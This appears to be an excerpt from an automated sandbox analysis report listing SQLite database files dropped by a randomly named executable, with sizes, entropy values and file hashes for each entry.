                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
